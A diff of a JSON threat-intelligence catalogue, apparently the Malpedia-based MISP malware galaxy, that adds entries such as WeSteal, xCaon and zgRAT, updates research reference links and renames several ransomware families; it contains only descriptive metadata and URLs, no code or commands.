"https://community.riskiq.com/article/541a465f/description", "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", - "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf" ], "synonyms": [], "type": [] @@ -32635,6 +37152,19 @@ "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", "value": "WellMess" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.westeal", + "https://unit42.paloaltonetworks.com/westeal/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8ec2d984-8c10-49f2-ad97-64af275a7afc", + "value": "WeSteal" + }, { "description": "According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain \"working_hours\" with a granularity of one minute.", "meta": { @@ -32695,14 +37225,20 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", + "https://www.youtube.com/watch?v=_fstHQSK-kk", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", "https://securelist.com/games-are-over/70991/", "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", + "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", "https://github.com/TKCERT/winnti-suricata-lua", + "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", "http://web.br.de/interaktiv/winnti/english/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", @@ -32719,13 +37255,17 @@ "https://github.com/TKCERT/winnti-detector", "https://github.com/superkhung/winnti-sniff", "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", "https://content.fireeye.com/api/pdfproxy?id=86840", "https://github.com/br-data/2019-winnti-analyse/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://github.com/TKCERT/winnti-nmap-script", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf", "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf", "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" ], @@ -32775,11 +37315,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", - "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf" + ], + "synonyms": [ + "Epic", + "Tavdig" ], - "synonyms": [], "type": [] }, "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", @@ -32941,7 +37485,8 @@ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", "https://www.secureworks.com/research/threat-profiles/iron-twilight", - "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ "chopstick", @@ -32977,6 +37522,19 @@ "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", "value": "XBTL" }, + { + "description": "Checkpoint Research found this backdoor, attributed to IndigoZebra, used to target Afghan and other Central-Asia countries, including Kyrgyzstan and Uzbekistan, since at least 2014.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xcaon", + "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2c150ebc-8fdf-4324-96cd-d6b0c0087d55", + "value": "xCaon" + }, { "description": "According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.", "meta": { @@ -32984,6 +37542,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy", "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf", "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://github.com/eset/malware-ioc/tree/master/xdspy/" ], "synonyms": [], @@ -33034,22 +37593,22 @@ "value": "XFSCashNCR" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba", "https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html" ], "synonyms": [ - "FlyStudio Ransomware" + "FlyStudio" ], "type": [] }, "uuid": "e839ae61-616c-4234-8edb-36b48040e5af", - "value": "XiaoBa Ransomware" + "value": "XiaoBa" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10", @@ -33061,7 +37620,7 @@ "type": [] }, "uuid": "6aa7047f-7dfa-4a10-b515-853c3795db69", - "value": "XP10 Ransomware" + "value": "XP10" }, { "description": "", @@ -33099,6 +37658,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", "https://labs.k7computing.com/?p=15672", "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration" ], @@ -33245,7 +37805,7 @@ "value": "Yahoyah" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware", @@ -33257,7 +37817,7 @@ "type": [] }, "uuid": "0308eff9-1e8c-434e-b551-40f0ceb7dc0e", - "value": "Yakuza Ransomware" + "value": "Yakuza" }, { "description": "Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.", @@ -33271,7 +37831,7 @@ "type": [] }, "uuid": "3bba089d-cd27-465c-8c40-2ff9ff0316c6", - "value": "Yarraq Ransomware" + "value": "Yarraq" }, { "description": "", @@ -33363,7 +37923,7 @@ "value": "yty" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.z3", @@ -33375,7 +37935,7 @@ "type": [] }, "uuid": "3eb96cd0-2d00-45a8-a0a4-54663cc70ab9", - "value": "Z3 Ransomware" + "value": "Z3" }, { "description": "Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.", @@ -33398,22 +37958,24 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/", "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", + "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", "https://research.checkpoint.com/malware-against-the-c-monoculture/", "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/", - "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", - "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/", "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", @@ -33458,6 +38020,19 @@ "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", "value": "Zedhou" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar", + "https://twitter.com/3xp0rtblog/status/1387996083712888832?s=20" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7502f293-0b7f-417f-a13a-1c71dadc5ccc", + "value": "zenar" + }, { "description": "", "meta": { @@ -33475,18 +38050,20 @@ "description": "Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin_ransomware", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf", + "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", - "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html" + "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "synonyms": [], "type": [] }, "uuid": "5587d163-d5ec-43fc-8071-7e7cd1002ba7", - "value": "Zeppelin Ransomware" + "value": "Zeppelin" }, { "description": "", @@ -33495,6 +38072,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", + "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", @@ -33572,29 +38150,40 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", "https://www.s21sec.com/en/zeus-the-missing-link/", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", + "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", "http://eternal-todo.com/blog/new-zeus-binary", + "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/", + "http://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", "http://eternal-todo.com/blog/zeus-spreading-facebook", "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", + "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf", "https://www.secureworks.com/research/zeus?threat=zeus", "https://www.secureworks.com/research/threat-profiles/bronze-woodland", "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", "http://eternal-todo.com/blog/detecting-zeus", - "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", "https://www.mnin.org/write/ZeusMalware.pdf", "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" @@ -33677,6 +38266,19 @@ "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", "value": "Zezin" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat", + "https://bazaar.abuse.ch/browse/signature/zgRAT/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0c3ea882-72a7-4838-b79a-150be30b6a36", + "value": "zgRAT" + }, { "description": "", "meta": { @@ -33709,7 +38311,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo", - "https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/" + "https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/", + "https://mobisec.reyammer.io/slides" ], "synonyms": [ "ZeuS-in-the-Mobile" @@ -33737,46 +38340,64 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/", + "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/", "https://twitter.com/ffforward/status/1324281530026524672", "https://twitter.com/VK_Intel/status/1294320579311435776", "https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/", "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed", "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", + "https://blogs.quickheal.com/zloader-entailing-different-office-files/", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://johannesbader.ch/blog/the-dga-of-zloader/", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1", "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/", "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/", + "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf", "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", - "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns", "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://www.youtube.com/watch?v=QBoj6GB79wM", "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/", "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/", "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://labs.k7computing.com/?p=22458", "https://blog.alyac.co.kr/3322", "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/", "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader", "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/", "https://www.lac.co.jp/lacwatch/people/20201106_002321.html" ], @@ -33859,5 +38480,5 @@ "value": "Zyklon" } ], - "version": 8790 + "version": 11601 }